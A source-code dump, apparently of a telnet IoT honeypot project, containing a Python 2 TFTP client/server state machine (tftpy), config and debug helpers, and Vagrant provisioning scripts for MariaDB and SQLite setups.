    # TftpPacketERR's docstring (0-7, plus 8 for option negotiation failure).
    NotDefined = 0
    FileNotFound = 1
    AccessViolation = 2
    DiskFull = 3
    IllegalTftpOp = 4
    UnknownTID = 5
    FileAlreadyExists = 6
    NoSuchUser = 7
    FailedNegotiation = 8

class TftpException(Exception):
    """This class is the parent class of all exceptions regarding the handling
    of the TFTP protocol."""
    pass

class TftpTimeout(TftpException):
    """This class represents a timeout error waiting for a response from the
    other end."""
    pass

================================================
FILE: tftpy/TftpStates.py
================================================
"""This module implements all state handling during uploads and downloads, the
main interface to which being the TftpState base class.

The concept is simple. Each context object represents a single upload or
download, and the state object in the context object represents the current
state of that transfer. The state object has a handle() method that expects
the next packet in the transfer, and returns a state object until the transfer
is complete, at which point it returns None.
That is, unless there is a fatal error, in which case a TftpException is returned instead.""" from TftpShared import * from TftpPacketTypes import * import os ############################################################################### # State classes ############################################################################### class TftpState(object): """The base class for the states.""" def __init__(self, context): """Constructor for setting up common instance variables. The involved file object is required, since in tftp there's always a file involved.""" self.context = context def handle(self, pkt, raddress, rport): """An abstract method for handling a packet. It is expected to return a TftpState object, either itself or a new state.""" raise NotImplementedError, "Abstract method" def handleOACK(self, pkt): """This method handles an OACK from the server, syncing any accepted options.""" if pkt.options.keys() > 0: if pkt.match_options(self.context.options): log.info("Successful negotiation of options") # Set options to OACK options self.context.options = pkt.options for key in self.context.options: log.info(" %s = %s" % (key, self.context.options[key])) else: log.error("Failed to negotiate options") raise TftpException, "Failed to negotiate options" else: raise TftpException, "No options found in OACK" def returnSupportedOptions(self, options): """This method takes a requested options list from a client, and returns the ones that are supported.""" # We support the options blksize and tsize right now. # FIXME - put this somewhere else? accepted_options = {} for option in options: if option == 'blksize': # Make sure it's valid. 
if int(options[option]) > MAX_BLKSIZE: log.info("Client requested blksize greater than %d " "setting to maximum" % MAX_BLKSIZE) accepted_options[option] = MAX_BLKSIZE elif int(options[option]) < MIN_BLKSIZE: log.info("Client requested blksize less than %d " "setting to minimum" % MIN_BLKSIZE) accepted_options[option] = MIN_BLKSIZE else: accepted_options[option] = options[option] elif option == 'tsize': log.debug("tsize option is set") accepted_options['tsize'] = 1 else: log.info("Dropping unsupported option '%s'" % option) log.debug("Returning these accepted options: %s" % accepted_options) return accepted_options def serverInitial(self, pkt, raddress, rport): """This method performs initial setup for a server context transfer, put here to refactor code out of the TftpStateServerRecvRRQ and TftpStateServerRecvWRQ classes, since their initial setup is identical. The method returns a boolean, sendoack, to indicate whether it is required to send an OACK to the client.""" options = pkt.options sendoack = False if not self.context.tidport: self.context.tidport = rport log.info("Setting tidport to %s" % rport) log.debug("Setting default options, blksize") self.context.options = { 'blksize': DEF_BLKSIZE } if options: log.debug("Options requested: %s" % options) supported_options = self.returnSupportedOptions(options) self.context.options.update(supported_options) sendoack = True # FIXME - only octet mode is supported at this time. if pkt.mode != 'octet': self.sendError(TftpErrors.IllegalTftpOp) raise TftpException, \ "Only octet transfers are supported at this time." # test host/port of client end if self.context.host != raddress or self.context.port != rport: self.sendError(TftpErrors.UnknownTID) log.error("Expected traffic from %s:%s but received it " "from %s:%s instead." % (self.context.host, self.context.port, raddress, rport)) # FIXME: increment an error count? # Return same state, we're still waiting for valid traffic. 
            return self

        log.debug("Requested filename is %s" % pkt.filename)
        # There are no os.sep's allowed in the filename.
        # FIXME: Should we allow subdirectories?
        if pkt.filename.find(os.sep) >= 0:
            self.sendError(TftpErrors.IllegalTftpOp)
            raise TftpException, "%s found in filename, not permitted" % os.sep

        self.context.file_to_transfer = pkt.filename

        return sendoack

    def sendDAT(self):
        """This method sends the next DAT packet based on the data in the
        context. It returns a boolean indicating whether the transfer is
        finished."""
        finished = False
        blocknumber = self.context.next_block
        # Test hook
        if DELAY_BLOCK and DELAY_BLOCK == blocknumber:
            import time
            log.debug("Deliberately delaying 10 seconds...")
            time.sleep(10)
        tftpassert( blocknumber > 0, "There is no block zero!" )
        dat = None
        blksize = self.context.getBlocksize()
        buffer = self.context.fileobj.read(blksize)
        log.debug("Read %d bytes into buffer" % len(buffer))
        # A read shorter than blksize marks the final data block of the
        # transfer, so the transfer is finished after this packet.
        if len(buffer) < blksize:
            log.info("Reached EOF on file %s"
                % self.context.file_to_transfer)
            finished = True
        dat = TftpPacketDAT()
        dat.data = buffer
        dat.blocknumber = blocknumber
        self.context.metrics.bytes += len(dat.data)
        log.debug("Sending DAT packet %d" % dat.blocknumber)
        self.context.sock.sendto(dat.encode().buffer,
                                 (self.context.host, self.context.tidport))
        # packethook is an optional per-transfer callback for observers.
        if self.context.packethook:
            self.context.packethook(dat)
        # Remember the packet so resendLast() can retransmit it on timeout.
        self.context.last_pkt = dat
        return finished

    def sendACK(self, blocknumber=None):
        """This method sends an ack packet to the block number specified.
If none is specified, it defaults to the next_block property in the parent context.""" log.debug("In sendACK, passed blocknumber is %s" % blocknumber) if blocknumber is None: blocknumber = self.context.next_block log.info("Sending ack to block %d" % blocknumber) ackpkt = TftpPacketACK() ackpkt.blocknumber = blocknumber self.context.sock.sendto(ackpkt.encode().buffer, (self.context.host, self.context.tidport)) self.context.last_pkt = ackpkt def sendError(self, errorcode): """This method uses the socket passed, and uses the errorcode to compose and send an error packet.""" log.debug("In sendError, being asked to send error %d" % errorcode) errpkt = TftpPacketERR() errpkt.errorcode = errorcode self.context.sock.sendto(errpkt.encode().buffer, (self.context.host, self.context.tidport)) self.context.last_pkt = errpkt def sendOACK(self): """This method sends an OACK packet with the options from the current context.""" log.debug("In sendOACK with options %s" % self.context.options) pkt = TftpPacketOACK() pkt.options = self.context.options self.context.sock.sendto(pkt.encode().buffer, (self.context.host, self.context.tidport)) self.context.last_pkt = pkt def resendLast(self): "Resend the last sent packet due to a timeout." 
        log.warn("Resending packet %s on sessions %s"
            % (self.context.last_pkt, self))
        self.context.metrics.resent_bytes += len(self.context.last_pkt.buffer)
        self.context.metrics.add_dup(self.context.last_pkt)
        self.context.sock.sendto(self.context.last_pkt.encode().buffer,
                                 (self.context.host, self.context.tidport))
        if self.context.packethook:
            self.context.packethook(self.context.last_pkt)

    def handleDat(self, pkt):
        """This method handles a DAT packet during a client download, or a
        server upload.

        Returns None when the final (short) data block has been written,
        otherwise a TftpStateExpectDAT to continue the transfer. Raises
        TftpException on a block-zero DAT or a future (out-of-order) block."""
        log.info("Handling DAT packet - block %d" % pkt.blocknumber)
        log.debug("Expecting block %s" % self.context.next_block)
        if pkt.blocknumber == self.context.next_block:
            log.debug("Good, received block %d in sequence"
                        % pkt.blocknumber)

            # ACK first, then advance the expected block counter.
            self.sendACK()
            self.context.next_block += 1

            log.debug("Writing %d bytes to output file"
                        % len(pkt.data))
            self.context.fileobj.write(pkt.data)
            self.context.metrics.bytes += len(pkt.data)
            # Check for end-of-file, any less than full data packet.
            if len(pkt.data) < self.context.getBlocksize():
                log.info("End of file detected")
                return None

        elif pkt.blocknumber < self.context.next_block:
            if pkt.blocknumber == 0:
                log.warn("There is no block zero!")
                self.sendError(TftpErrors.IllegalTftpOp)
                raise TftpException, "There is no block zero!"
            # A stale block means our ACK was likely lost; count the dup and
            # re-ACK so the peer can make progress.
            log.warn("Dropping duplicate block %d" % pkt.blocknumber)
            self.context.metrics.add_dup(pkt)
            log.debug("ACKing block %d again, just in case" % pkt.blocknumber)
            self.sendACK(pkt.blocknumber)

        else:
            # FIXME: should we be more tolerant and just discard instead?
            msg = "Whoa! Received future block %d but expected %d" \
                % (pkt.blocknumber, self.context.next_block)
            log.error(msg)
            raise TftpException, msg

        # Default is to ack
        return TftpStateExpectDAT(self.context)

class TftpStateServerRecvRRQ(TftpState):
    """This class represents the state of the TFTP server when it has just
    received an RRQ packet."""
    def handle(self, pkt, raddress, rport):
        "Handle an initial RRQ packet as a server."
log.debug("In TftpStateServerRecvRRQ.handle") sendoack = self.serverInitial(pkt, raddress, rport) path = self.context.root + os.sep + self.context.file_to_transfer log.info("Opening file %s for reading" % path) if os.path.exists(path): # Note: Open in binary mode for win32 portability, since win32 # blows. self.context.fileobj = open(path, "rb") elif self.context.dyn_file_func: log.debug("No such file %s but using dyn_file_func" % path) self.context.fileobj = \ self.context.dyn_file_func(self.context.file_to_transfer) if self.context.fileobj is None: log.debug("dyn_file_func returned 'None', treating as " "FileNotFound") self.sendError(TftpErrors.FileNotFound) raise TftpException, "File not found: %s" % path else: self.sendError(TftpErrors.FileNotFound) raise TftpException, "File not found: %s" % path # Options negotiation. if sendoack: # Note, next_block is 0 here since that's the proper # acknowledgement to an OACK. # FIXME: perhaps we do need a TftpStateExpectOACK class... self.sendOACK() # Note, self.context.next_block is already 0. else: self.context.next_block = 1 log.debug("No requested options, starting send...") self.context.pending_complete = self.sendDAT() # Note, we expect an ack regardless of whether we sent a DAT or an # OACK. return TftpStateExpectACK(self.context) # Note, we don't have to check any other states in this method, that's # up to the caller. class TftpStateServerRecvWRQ(TftpState): """This class represents the state of the TFTP server when it has just received a WRQ packet.""" def handle(self, pkt, raddress, rport): "Handle an initial WRQ packet as a server." log.debug("In TftpStateServerRecvWRQ.handle") sendoack = self.serverInitial(pkt, raddress, rport) path = self.context.root + os.sep + self.context.file_to_transfer log.info("Opening file %s for writing" % path) if os.path.exists(path): # FIXME: correct behavior? log.warn("File %s exists already, overwriting..." 
% self.context.file_to_transfer) # FIXME: I think we should upload to a temp file and not overwrite the # existing file until the file is successfully uploaded. self.context.fileobj = open(path, "wb") # Options negotiation. if sendoack: log.debug("Sending OACK to client") self.sendOACK() else: log.debug("No requested options, expecting transfer to begin...") self.sendACK() # Whether we're sending an oack or not, we're expecting a DAT for # block 1 self.context.next_block = 1 # We may have sent an OACK, but we're expecting a DAT as the response # to either the OACK or an ACK, so lets unconditionally use the # TftpStateExpectDAT state. return TftpStateExpectDAT(self.context) # Note, we don't have to check any other states in this method, that's # up to the caller. class TftpStateServerStart(TftpState): """The start state for the server. This is a transitory state since at this point we don't know if we're handling an upload or a download. We will commit to one of them once we interpret the initial packet.""" def handle(self, pkt, raddress, rport): """Handle a packet we just received.""" log.debug("In TftpStateServerStart.handle") if isinstance(pkt, TftpPacketRRQ): log.debug("Handling an RRQ packet") return TftpStateServerRecvRRQ(self.context).handle(pkt, raddress, rport) elif isinstance(pkt, TftpPacketWRQ): log.debug("Handling a WRQ packet") return TftpStateServerRecvWRQ(self.context).handle(pkt, raddress, rport) else: self.sendError(TftpErrors.IllegalTftpOp) raise TftpException, \ "Invalid packet to begin up/download: %s" % pkt class TftpStateExpectACK(TftpState): """This class represents the state of the transfer when a DAT was just sent, and we are waiting for an ACK from the server. This class is the same one used by the client during the upload, and the server during the download.""" def handle(self, pkt, raddress, rport): "Handle a packet, hopefully an ACK since we just sent a DAT." 
        if isinstance(pkt, TftpPacketACK):
            log.info("Received ACK for packet %d" % pkt.blocknumber)
            # Is this an ack to the one we just sent?
            if self.context.next_block == pkt.blocknumber:
                if self.context.pending_complete:
                    log.info("Received ACK to final DAT, we're done.")
                    # Returning None ends the transfer state machine.
                    return None
                else:
                    log.debug("Good ACK, sending next DAT")
                    self.context.next_block += 1
                    log.debug("Incremented next_block to %d" % (self.context.next_block))
                    self.context.pending_complete = self.sendDAT()
            elif pkt.blocknumber < self.context.next_block:
                # Stale ACK for an earlier block: count it, do not resend.
                log.debug("Received duplicate ACK for block %d" % pkt.blocknumber)
                self.context.metrics.add_dup(pkt)
            else:
                # ACK for a block we have not sent yet - peer protocol
                # violation; record the error and stay in this state.
                log.warn("Oooh, time warp. Received ACK to packet we "
                         "didn't send yet. Discarding.")
                self.context.metrics.errors += 1
            return self
        elif isinstance(pkt, TftpPacketERR):
            log.error("Received ERR packet from peer: %s" % str(pkt))
            raise TftpException, \
                "Received ERR packet from peer: %s" % str(pkt)
        else:
            log.warn("Discarding unsupported packet: %s" % str(pkt))
            return self

class TftpStateExpectDAT(TftpState):
    """Just sent an ACK packet. Waiting for DAT."""
    def handle(self, pkt, raddress, rport):
        """Handle the packet in response to an ACK, which should be a DAT.

        Returns the next state object; any non-DAT packet triggers an
        error packet to the peer plus a TftpException."""
        if isinstance(pkt, TftpPacketDAT):
            return self.handleDat(pkt)

        # Every other packet type is a problem.
        elif isinstance(pkt, TftpPacketACK):
            # Umm, we ACK, you don't.
            self.sendError(TftpErrors.IllegalTftpOp)
            raise TftpException, "Received ACK from peer when expecting DAT"

        elif isinstance(pkt, TftpPacketWRQ):
            self.sendError(TftpErrors.IllegalTftpOp)
            raise TftpException, "Received WRQ from peer when expecting DAT"

        elif isinstance(pkt, TftpPacketERR):
            self.sendError(TftpErrors.IllegalTftpOp)
            raise TftpException, "Received ERR from peer: " + str(pkt)

        else:
            self.sendError(TftpErrors.IllegalTftpOp)
            raise TftpException, "Received unknown packet type from peer: " + str(pkt)

class TftpStateSentWRQ(TftpState):
    """Just sent an WRQ packet for an upload."""
    def handle(self, pkt, raddress, rport):
        """Handle a packet we just received."""
        # The server replies from an ephemeral port (its TID); remember it
        # so the rest of the session addresses the right port.
        if not self.context.tidport:
            self.context.tidport = rport
            log.debug("Set remote port for session to %s" % rport)

        # If we're going to successfully transfer the file, then we should see
        # either an OACK for accepted options, or an ACK to ignore options.
        if isinstance(pkt, TftpPacketOACK):
            log.info("Received OACK from server")
            try:
                self.handleOACK(pkt)
            except TftpException:
                log.error("Failed to negotiate options")
                self.sendError(TftpErrors.FailedNegotiation)
                raise
            else:
                log.debug("Sending first DAT packet")
                self.context.pending_complete = self.sendDAT()
                log.debug("Changing state to TftpStateExpectACK")
                return TftpStateExpectACK(self.context)

        elif isinstance(pkt, TftpPacketACK):
            log.info("Received ACK from server")
            log.debug("Apparently the server ignored our options")
            # The block number should be zero.
            if pkt.blocknumber == 0:
                log.debug("Ack blocknumber is zero as expected")
                log.debug("Sending first DAT packet")
                self.context.pending_complete = self.sendDAT()
                log.debug("Changing state to TftpStateExpectACK")
                return TftpStateExpectACK(self.context)
            else:
                log.warn("Discarding ACK to block %s" % pkt.blocknumber)
                log.debug("Still waiting for valid response from server")
                return self

        elif isinstance(pkt, TftpPacketERR):
            self.sendError(TftpErrors.IllegalTftpOp)
            raise TftpException, "Received ERR from server: " + str(pkt)

        elif isinstance(pkt, TftpPacketRRQ):
            self.sendError(TftpErrors.IllegalTftpOp)
            raise TftpException, "Received RRQ from server while in upload"

        elif isinstance(pkt, TftpPacketDAT):
            self.sendError(TftpErrors.IllegalTftpOp)
            raise TftpException, "Received DAT from server while in upload"

        else:
            self.sendError(TftpErrors.IllegalTftpOp)
            raise TftpException, "Received unknown packet type from server: " + str(pkt)

        # By default, no state change.
        return self

class TftpStateSentRRQ(TftpState):
    """Just sent an RRQ packet."""
    def handle(self, pkt, raddress, rport):
        """Handle the packet in response to an RRQ to the server."""
        # Remember the server's transfer ID (its chosen source port).
        if not self.context.tidport:
            self.context.tidport = rport
            log.info("Set remote port for session to %s" % rport)

        # Now check the packet type and dispatch it properly.
        if isinstance(pkt, TftpPacketOACK):
            log.info("Received OACK from server")
            try:
                self.handleOACK(pkt)
            except TftpException, err:
                log.error("Failed to negotiate options: %s" % str(err))
                self.sendError(TftpErrors.FailedNegotiation)
                raise
            else:
                log.debug("Sending ACK to OACK")
                # ACK with block number 0 confirms the negotiated options.
                self.sendACK(blocknumber=0)
                log.debug("Changing state to TftpStateExpectDAT")
                return TftpStateExpectDAT(self.context)

        elif isinstance(pkt, TftpPacketDAT):
            # If there are any options set, then the server didn't honour any
            # of them.
            log.info("Received DAT from server")
            if self.context.options:
                log.info("Server ignored options, falling back to defaults")
                self.context.options = { 'blksize': DEF_BLKSIZE }
            return self.handleDat(pkt)

        # Every other packet type is a problem.
        elif isinstance(pkt, TftpPacketACK):
            # Umm, we ACK, the server doesn't.
            self.sendError(TftpErrors.IllegalTftpOp)
            raise TftpException, "Received ACK from server while in download"

        elif isinstance(pkt, TftpPacketWRQ):
            self.sendError(TftpErrors.IllegalTftpOp)
            raise TftpException, "Received WRQ from server while in download"

        elif isinstance(pkt, TftpPacketERR):
            self.sendError(TftpErrors.IllegalTftpOp)
            raise TftpException, "Received ERR from server: " + str(pkt)

        else:
            self.sendError(TftpErrors.IllegalTftpOp)
            raise TftpException, "Received unknown packet type from server: " + str(pkt)

        # By default, no state change.
        return self

================================================
FILE: tftpy/__init__.py
================================================

"""
This library implements the tftp protocol, based on rfc 1350.
http://www.faqs.org/rfcs/rfc1350.html
At the moment it implements only a client class, but will include a server,
with support for variable block sizes.

As a client of tftpy, this is the only module that you should need to
import directly. The TftpClient and TftpServer classes can be reached
through it.
"""

import sys

# Make sure that this is at least Python 2.3
# NOTE(review): this check is wrong for Python 3.0-3.2 (minor version 0-2
# fails the `>= 3` test even though 3.x is newer than 2.3). Harmless here,
# since the surrounding code is Python 2 only.
verlist = sys.version_info
if not verlist[0] >= 2 or not verlist[1] >= 3:
    raise AssertionError, "Requires at least Python 2.3"

# Re-export the package's public API (Python 2 implicit relative imports).
from TftpShared import *
from TftpPacketTypes import *
from TftpPacketFactory import *
from TftpClient import *
from TftpServer import *
from TftpContexts import *
from TftpStates import *

================================================
FILE: util/__init__.py
================================================

================================================
FILE: util/config.py
================================================

import yaml
import random
import string

def rand():
    # Return a 32-character random token of uppercase letters and digits,
    # drawn from the OS CSPRNG via random.SystemRandom.
    chars = string.ascii_uppercase + string.digits
    return ''.join(random.SystemRandom().choice(chars) for _ in range(32))

class Config:
    # Layered configuration: values from config.yaml (user) override the
    # defaults shipped in config.dist.yaml.
    def __init__(self):
        self.distconfig = self.loadyaml("config.dist.yaml")
        try:
            self.userconfig = self.loadyaml("config.yaml")
        except:
            # A missing/unreadable config.yaml is tolerated, but this bare
            # except also hides unrelated errors (even KeyboardInterrupt).
            print "Warning: Cannot load config.yaml"
            self.userconfig = {}

    def loadyaml(self, filename):
        # Parse a YAML file and return the deserialized object.
        # SECURITY NOTE(review): yaml.load without an explicit Loader can
        # construct arbitrary Python objects. Acceptable for trusted local
        # config files, but yaml.safe_load would be the safer default.
        with open(filename, "rb") as fp:
            string = fp.read()  # NOTE: shadows the `string` module locally
        return yaml.load(string)

    def loadUserConfig(self, filename):
        # Best-effort replacement of the user config layer from `filename`;
        # leaves the previous userconfig in place on failure.
        try:
            self.userconfig = self.loadyaml(filename)
        except:
            print "Warning: Cannot load " + str(filename)

    def get(self, key, optional=False, default=None):
        # Look up `key` in the user config first, then the dist defaults.
        # Raises for a missing mandatory option; returns `default` when
        # optional=True.
        if key in self.userconfig:
            return self.userconfig[key]
        elif key in self.distconfig:
            return self.distconfig[key]
        elif not(optional):
            raise Exception("Option \""+ key +"\" not found in config")
        else:
            return default

# Module-level singleton: importing util.config reads both YAML files once.
config = Config()

================================================
FILE: util/dbg.py
================================================

import datetime
import traceback
import sys
import os.path

# Global switch for debug output.
DEBUG = True

def dbg(msg):
    # Print `msg` prefixed with a timestamp and the caller's file:line,
    # then flush stdout so output appears immediately (e.g. inside screen).
    if DEBUG:
        now = datetime.datetime.now()
        now = now.strftime('%Y-%m-%d %H:%M:%S')
        # extract_stack()[-2] is the frame that called dbg();
        # line[0] is the filename, line[1] the line number.
        line = traceback.extract_stack()[-2]
        line = os.path.basename(line[0]) + ":" + str(line[1])
        print(now + " " + line.ljust(16, " ") + " " + msg)
        sys.stdout.flush()
================================================
FILE: vagrant/.gitignore
================================================

.vagrant
*.log

================================================
FILE: vagrant/mariadb/Vagrantfile
================================================

# -*- mode: ruby -*-
# vi: set ft=ruby :

# All Vagrant configuration is done below. The "2" in Vagrant.configure
# configures the configuration version (we support older styles for
# backwards compatibility). Please don't change it unless you know what
# you're doing.
Vagrant.configure(2) do |config|
  # The most common configuration options are documented and commented below.
  # For a complete reference, please see the online documentation at
  # https://docs.vagrantup.com.

  # Every Vagrant development environment requires a box. You can search for
  # boxes at https://atlas.hashicorp.com/search.
  config.vm.box = "ubuntu/xenial64"

  # Disable automatic box update checking. If you disable this, then
  # boxes will only be checked for updates when the user runs
  # `vagrant box outdated`. This is not recommended.
  # config.vm.box_check_update = false

  # Create a forwarded port mapping which allows access to a specific port
  # within the machine from a port on the host machine. In the example below,
  # accessing "localhost:8080" will access port 80 on the guest machine.
  # NOTE(review): 5000 is the backend web interface; 2323 is presumably the
  # honeypot telnet listener - confirm against config.dist.yaml.
  config.vm.network "forwarded_port", guest: 5000, host: 5000
  config.vm.network "forwarded_port", guest: 2323, host: 2323

  # Create a private network, which allows host-only access to the machine
  # using a specific IP.
  # config.vm.network "private_network", ip: "192.168.33.10"

  # Create a public network, which generally maps to a bridged network.
  # Bridged networks make the machine appear as another physical device on
  # your network.
  # config.vm.network "public_network"

  # Share an additional folder to the guest VM. The first argument is
  # the path on the host to the actual folder. The second argument is
  # the path on the guest to mount the folder. And the optional third
  # argument is a set of non-required options.
  # This mounts the repository root so provisioning can copy it into the VM.
  config.vm.synced_folder "../../", "/vagrant_data"

  # Provider-specific configuration so you can fine-tune various
  # backing providers for Vagrant. These expose provider-specific options.
  # Example for VirtualBox:
  config.vm.provider "virtualbox" do |vb|
    # Display the VirtualBox GUI when booting the machine
    vb.gui = false
    # Customize the amount of memory on the VM:
    vb.memory = "1024"
    # vb.cpus = 2
  end

  # View the documentation for the provider you are using for more
  # information on available options.

  # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies
  # such as FTP and Heroku are also available. See the documentation at
  # https://docs.vagrantup.com/v2/push/atlas.html for more information.
  # config.push.define "atlas" do |push|
  #   push.app = "YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME"
  # end

  # Enable provisioning with a shell script. Additional provisioners such as
  # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the
  # documentation for more information about their specific syntax and use.
config.vm.provision "shell", privileged: 'false', inline: <<-SHELL sudo apt-get update sudo apt-get install -y python-pip sqlite3 screen libmysqlclient-dev python-mysqldb cp -r /vagrant_data telnet-iot-honeypot cd telnet-iot-honeypot rm database.db rm config.yaml export LC_ALL=C sudo pip install -r requirements.txt sudo bash create_config.sh sudo bash vagrant/mariadb/mysql.sh SHELL config.vm.provision "shell", privileged: 'false', run: 'always', inline: <<-SHELL screen -dmS backend bash -c "cd telnet-iot-honeypot; python backend.py" sleep 5 screen -dmS honeypot bash -c "cd telnet-iot-honeypot; python honeypot.py" screen -list SHELL end ================================================ FILE: vagrant/mariadb/mysql.sh ================================================ #/bin/bash echo " - Install MariaDB" sudo apt-get install -y mariadb-server user=honey db=honey pw=$(openssl rand -hex 16) sql="mysql+mysqldb://$user:$pw@localhost/$db" echo " - Create DB" echo "" echo "DROP USER $user;" | sudo mysql echo "DROP USER '$user'@'localhost'" | sudo mysql echo "DROP DATABASE $db;" | sudo mysql echo "CREATE USER '$user'@'localhost' IDENTIFIED BY '$pw'; CREATE DATABASE $db CHARACTER SET latin1 COLLATE latin1_swedish_ci; GRANT ALL ON $db.* TO '$user'@'localhost'; FLUSH PRIVILEGES; " | sudo mysql echo " - Writing config" echo sql: \"$sql\" >> config.yaml ================================================ FILE: vagrant/sqlite/Vagrantfile ================================================ # -*- mode: ruby -*- # vi: set ft=ruby : # All Vagrant configuration is done below. The "2" in Vagrant.configure # configures the configuration version (we support older styles for # backwards compatibility). Please don't change it unless you know what # you're doing. Vagrant.configure(2) do |config| # The most common configuration options are documented and commented below. # For a complete reference, please see the online documentation at # https://docs.vagrantup.com. 
# Every Vagrant development environment requires a box. You can search for # boxes at https://atlas.hashicorp.com/search. config.vm.box = "ubuntu/xenial64" # Disable automatic box update checking. If you disable this, then # boxes will only be checked for updates when the user runs # `vagrant box outdated`. This is not recommended. # config.vm.box_check_update = false # Create a forwarded port mapping which allows access to a specific port # within the machine from a port on the host machine. In the example below, # accessing "localhost:8080" will access port 80 on the guest machine. config.vm.network "forwarded_port", guest: 5000, host: 5000 config.vm.network "forwarded_port", guest: 2323, host: 2323 # Create a private network, which allows host-only access to the machine # using a specific IP. # config.vm.network "private_network", ip: "192.168.33.10" # Create a public network, which generally matched to bridged network. # Bridged networks make the machine appear as another physical device on # your network. # config.vm.network "public_network" # Share an additional folder to the guest VM. The first argument is # the path on the host to the actual folder. The second argument is # the path on the guest to mount the folder. And the optional third # argument is a set of non-required options. config.vm.synced_folder "../../", "/vagrant_data" # Provider-specific configuration so you can fine-tune various # backing providers for Vagrant. These expose provider-specific options. # Example for VirtualBox: config.vm.provider "virtualbox" do |vb| # Display the VirtualBox GUI when booting the machine vb.gui = false # Customize the amount of memory on the VM: vb.memory = "768" # vb.cpus = 2 end # View the documentation for the provider you are using for more # information on available options. # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies # such as FTP and Heroku are also available. 
See the documentation at # https://docs.vagrantup.com/v2/push/atlas.html for more information. # config.push.define "atlas" do |push| # push.app = "YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME" # end # Enable provisioning with a shell script. Additional provisioners such as # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the # documentation for more information about their specific syntax and use. config.vm.provision "shell", privileged: 'false', inline: <<-SHELL sudo apt-get update sudo apt-get install -y python-pip sqlite3 screen cp -r /vagrant_data telnet-iot-honeypot cd telnet-iot-honeypot rm database.db rm config.yaml export LC_ALL=C sudo pip install -r requirements.txt sudo bash create_config.sh SHELL config.vm.provision "shell", privileged: 'false', run: 'always', inline: <<-SHELL screen -dmS backend bash -c "cd telnet-iot-honeypot; python backend.py" sleep 5 screen -dmS honeypot bash -c "cd telnet-iot-honeypot; python honeypot.py" screen -list SHELL end